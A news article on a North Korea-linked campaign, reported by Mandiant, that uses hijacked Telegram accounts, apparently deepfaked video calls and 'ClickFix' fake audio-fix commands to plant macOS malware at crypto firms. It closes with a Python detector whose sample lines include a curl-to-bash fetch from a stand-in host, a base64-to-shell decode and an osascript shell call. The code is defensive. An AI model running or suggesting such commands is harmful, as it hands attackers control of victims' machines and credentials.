North Korean Hackers Use Deepfakes to Target Crypto Firms
Feb 11, 2026: Cybersecurity researchers have uncovered a sophisticated hacking campaign believed to be linked to North Korea, targeting cryptocurrency and financial technology companies through deepfake video calls and advanced malware.
According to findings released by Google Cloud’s Mandiant Threat Intelligence team, the operation has been attributed to a financially motivated group tracked as UNC1069.
Investigators say the campaign combines social engineering tactics, artificial intelligence-generated deepfakes, and malware specifically designed to infect macOS systems. The apparent objective is to steal cryptocurrency and sensitive account credentials.
Hijacked Accounts Used to Build Trust
In one identified case, attackers used the Telegram account of a cryptocurrency executive that had previously been compromised.
The hijacked account was then used to contact other professionals in the fintech sector, initiating conversations to build credibility and trust.
After establishing communication, the attackers sent meeting invitations that appeared to be legitimate video conferences.
The meeting platform resembled a popular video conferencing service, but researchers say it was actually hosted on infrastructure controlled by the attackers.
One targeted individual reported encountering what appeared to be a live video call featuring a realistic deepfake impersonation of the executive.
While researchers were unable to independently verify the use of deepfake technology in every instance, they noted that AI-driven impersonation tactics are becoming increasingly common in cybercrime.
Malware Deployed Through “Technical Fix” Scam
During the fake meeting, victims were reportedly told they were experiencing audio issues and were guided through steps to “fix” the problem.
This tactic, sometimes referred to as a “ClickFix” attack, tricks users into running commands on their own devices under the pretense of resolving a technical issue.
Once executed, those commands allowed attackers to gain unauthorized access to the victim’s computer. Researchers say multiple backdoor tools were then deployed, enabling remote control and deeper system access.
Additional malware designed to steal information was also installed. These tools were capable of extracting login credentials from macOS Keychain, collecting browser data from Chrome, Brave, and Edge, and retrieving user information from messaging apps and note-taking software.
Security analysts believe the attackers aimed to gather as much data as possible, including passwords, session tokens, and authentication details, which could later be used for cryptocurrency theft or further social engineering attacks.
Broader Pattern of Crypto-Related Attacks
Cybersecurity experts warn that state-linked North Korean hacking groups have a long history of targeting cryptocurrency platforms and digital asset firms. Over the past several years, such groups have been associated with large-scale digital asset thefts worldwide.
Recent estimates suggest that North Korean-linked cyber operations accounted for a significant share of cryptocurrency stolen globally in 2025, with losses reaching billions of dollars. Analysts say digital assets remain attractive targets due to their speed of transfer and relative difficulty of recovery once stolen.
Growing Threat of AI-Enhanced Cybercrime
The campaign highlights the increasing role of artificial intelligence in cyberattacks. Deepfake technology and AI-assisted impersonation tools are making fraudulent communications more convincing and harder to detect.
Security professionals recommend that companies verify meeting invitations through secondary channels, implement multi-factor authentication, and train employees to recognize suspicious technical support requests. Experts also advise organizations to limit administrative privileges and closely monitor unusual system activity.
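As an added illustration of the "unusual system activity" defenders are advised to monitor above, and of the ClickFix pattern described earlier, the following Python scans shell-history lines for the command shapes a fake "audio fix" typically asks a victim to paste into a macOS terminal. This is example code written for this article, not tooling from the Mandiant report; the sample history lines and pattern names are constructed assumptions.

```python
import re

# Constructed sample of ~/.zsh_history-style lines (not taken from the report).
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    "curl -fsSL https://meeting-fix.example/audio.sh | bash",
    "echo 'ZWNobyBoaQ==' | base64 -d | sh",
    "git status",
    "osascript -e 'do shell script \"id\"'",
    "brew update",
]

# Each pattern captures one shape of "paste this to fix your audio" lure:
# a download piped straight into a shell, an encoded blob decoded into a
# shell, or AppleScript used to launch a shell command.
PATTERNS = {
    "remote_fetch_piped_to_shell": re.compile(
        r"\b(curl|wget)\b[^|;]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "base64_decoded_to_shell": re.compile(
        r"base64\s+(-d|--decode|-D)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "osascript_shell_script": re.compile(
        r"\bosascript\b.*do shell script"),
}


def scan_history(lines):
    """Return (line_number, pattern_name, command) for every suspicious line."""
    findings = []
    for number, line in enumerate(lines, start=1):
        for name, pattern in PATTERNS.items():
            if pattern.search(line):
                findings.append((number, name, line.strip()))
    return findings


if __name__ == "__main__":
    for number, name, command in scan_history(SAMPLE_HISTORY):
        print(f"line {number}: {name}: {command}")
```

On a real host the same function can be pointed at the user's shell history file or at command lines collected by an EDR agent; a match is a trigger for review, not proof of compromise.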
As cybercriminal tactics evolve, researchers say heightened vigilance and stronger cybersecurity practices are essential to protect financial and digital assets.